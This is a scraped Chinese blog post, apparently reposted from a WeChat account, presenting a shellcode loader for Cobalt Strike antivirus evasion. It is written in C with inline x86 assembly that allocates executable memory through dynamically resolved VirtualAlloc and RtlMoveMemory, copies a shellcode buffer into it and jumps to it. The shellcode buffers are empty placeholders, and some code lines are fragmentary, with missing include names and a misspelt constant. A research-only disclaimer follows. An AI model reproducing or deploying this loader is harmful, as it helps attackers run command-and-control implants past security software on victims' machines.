int main(int argc, char **argv){unsigned char buf[] = "xfc";void *exec = VirtualAlloc(0, sizeof buf, MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE);memcpy(exec, buf, sizeof buf);((void(*)())exec)();return 0;}
unsigned char buf[]="";
如果函数调用成功,返回值是DLL中的输出函数地址。
如果函数调用失败,返回值是NULL。得到进一步的错误信息,调用函数GetLastError
LPVOID lp = GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualAlloc");size_t dw_size = sizeof(buf);void *exec = NULL;
__asm{push 0x40;push 0x1000;mov eax, dw_size;push eax;push 0;mov eax, lp;call eax;mov exec, eax}
void *exec = VirtualAlloc(0,sizeof buf,MEM_COMMIT,PAGE_EXE_EXECUTE_READWRITE);__asm{push 0x40; //可读可写可执行页参数入栈push 0x1000; //MEM_COMMIT参数值入栈mov eax, dw_size; //定义空间大小push eax; //将空间大小入栈push 0; //由系统自行决定内存空间起始地址入栈mov eax, lp; //移动到virtualAlloc函数地址call eax; //运行该函数mov exec,eax;//调用地址}
buf, sizeof buf);LPVOID op = GetProcAddress(LoadLibraryA("kernel32.dll"), "RtlMoveMemory");__asm{mov eax, dw_size;push eax;lea eax, bufpush eaxmov ecx, execpush ecxmov eax, op;call eax;}
__asm{jmp exec;}
#include#includeunsigned char buf[]="";int main(){LPVOID lp = GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualAlloc");size_t dw_size = sizeof(buf);void *exec = NULL;__asm{push 0x40;push 0x1000;mov eax, dw_size;push eax;push 0;mov eax, lp;call eax;mov exec, eax;}LPVOID op = GetProcAddress(LoadLibraryA("kernel32.dll"), "RtlMoveMemory");__asm{mov eax, dw_size;push eax;lea eax, buf;push eax;mov ecx, exec;push ecx;mov eax, op;call eax;}__asm{jmp exec;}return 0;}
本文始发于微信公众号(XG小刚):CS免杀-内联汇编Loader
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论